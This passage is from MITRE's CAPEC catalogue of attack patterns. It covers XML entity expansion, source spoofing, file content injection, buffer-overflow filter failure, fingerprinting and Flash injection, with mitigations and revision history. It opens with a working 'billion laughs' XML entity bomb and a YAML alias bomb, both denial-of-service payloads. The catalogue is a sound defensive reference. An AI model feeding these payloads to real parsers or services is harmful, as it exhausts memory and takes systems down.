<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">

]>
<lolz>&lol9;</lolz>

This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.

This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]

a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling
776	Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
44	XML Entity Expansion

References

[REF-64] Amit Klein. "Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD". <http://www.securityfocus.com/archive/1/303509>.

[REF-65] Pete Lindstrom. "Attacking & Defending Web Services". SPiRE Security. 2002. <http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf>.

[REF-66] Elliotte Rusty Harold. "Tip: Configure SAX parsers for secure processing". IBM developerWorks. IBM. 2005-05-27. <http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html>.

[REF-67] Bryan Sullivan. "XML Denial of Service Attacks and Defenses". <http://msdn.microsoft.com/en-us/magazine/ee335713.aspx>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Name, Alternate_Terms, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Related_Weaknesses, Skills_Required
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2021-10-21 (Version 3.6)	XML Entity Expansion

CAPEC-194: Fake the Source of Data

Attack Pattern ID: 194

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	275	DNS Rebinding
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	543	Counterfeit Websites
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	544	Counterfeit Organizations
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	598	DNS Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	633	Token Impersonation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	697	DHCP Spoofing
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	657	Malicious Automated Software Update via Spoofing
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	667	Bluetooth Impersonation AttackS (BIAS)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

This attack is only applicable when a vulnerable entity associates data or services with an identity. Without such an association, there would be no reason to fake the source.

Resources Required

Resources required vary depending on the nature of the attack. Possible tools needed by an attacker could include tools to create custom network packets, specific client software, and tools to capture network traffic. Many variants of this attack require no attacker resources, however.

Consequences

Scope	Impact	Likelihood
Integrity	Alter Execution Logic
Integrity	Gain Privileges
Integrity	Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
38	URL Redirector Abuse

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns

CAPEC-23: File Content Injection

Attack Pattern ID: 23

Abstraction: Standard

View customized information:

Description

Extended Description

Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	242	Code Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	44	Overflow Binary Resource File
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	35	Leverage Executable Code in Non-Executable Files
CanAlsoBe	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	165	File Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target software must consume files.

The adversary must have access to modify files that the target software will consume.

Skills Required

[Level: Medium]

How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Design: Enforce principle of least privilege

Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)

Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.

Implementation: Virus scanning on host

Example Instances

PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.

Related Weaknesses

CWE-ID	Weakness Name
20	Improper Input Validation

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Example_Instances, References
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	File System Function Injection, Content Based

CAPEC-497: File Discovery

Attack Pattern ID: 497

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	149	Explore for Predictable Temporary File Names

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must know the location of these common key files.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Leverage file protection mechanisms to render these files accessible only to authorized parties.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1083	File and Directory Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Resources_Required

CAPEC-165: File Manipulation

Attack Pattern ID: 165

Abstraction: Meta

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	73	User-Controlled Filename
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	572	Artificially Inflate File Sizes
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	635	Alternative Execution Due to Deceptive Filenames
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	636	Hiding Malicious Data or Code within Files
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	643	Identify Shared Files/Directories on System
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	644	Use of Captured Hashes (Pass The Hash)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The target must use the affected file without verifying its integrity.

Resources Required

None: No specialized resources are required to execute this type of attack. In some cases, tools can be used to better control the response of the targeted application to the modified file.

Related Weaknesses

No mapping at this level, since it would encompass a plethora of CWEs. Look at related mappings of this CAPEC's descendants.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1036.003	Masquerading: Rename System Utilities

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-24: Filter Failure through Buffer Overflow

Attack Pattern ID: 24

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Survey: The attacker surveys the target application, possibly as a valid and authenticated user
Techniques
Spidering web sites for inputs that involve potential filtering
Brute force guessing of filtered inputs

Experiment

Attempt injections: Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.
Techniques
Brute force attack through black box penetration test tool.
Fuzzing of communications protocols
Manual testing of possible inputs with attack data.

Monitor responses: Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?

Techniques
Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.
Check Log files. An attacker with access to log files can look at the outcome of bad input.

Exploit

Abuse the system through filter failure: An attacker writes a script to consistently induce the filter failure.

Techniques
DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.
Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.
An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists.

Prerequisites

Ability to control the length of data passed to an active filter.

Skills Required

[Level: Low]

An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.

Indicators

Many exceptions are thrown by the application's filter modules in a short period of time. Check the logs. See if the probes are coming from the same IP address.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Bypass Protection Mechanism
Availability	Unreliable Execution

Mitigations

Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.

Pre-design: Use a language or compiler that performs automatic bounds checking.

Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Operational: Use OS-level preventative functionality. Not a complete solution.

Design: Use an abstraction library to abstract away risky APIs. Not a complete solution.

Example Instances

Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.

A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.

Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack.

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
118	Incorrect Access of Indexable Resource ('Range Error')
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
733	Compiler Optimization Removal or Modification of Security-critical Code
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-224: Fingerprinting

Attack Pattern ID: 224

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very Low

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	313	Passive OS Fingerprinting
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	541	Application Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

A means by which to interact with the target system directly.

Skills Required

[Level: Medium]

Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen.

Resources Required

If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
45	Fingerprinting

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Taxonomy_Mappings

CAPEC-181: Flash File Overlay

Attack Pattern ID: 181

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	103	Clickjacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.

The victim's browser must support invisible Flash overlays.

Resources Required

The attacker must be able to force the Flash overlay over the decoy content.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-182: Flash Injection

Attack Pattern ID: 182

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	174	Flash Parameter Injection
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	178	Cross-Site Flashing
CanAlsoBe	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Find Injection Entry Points: The attacker first takes an inventory of the entry points of the application.

Techniques
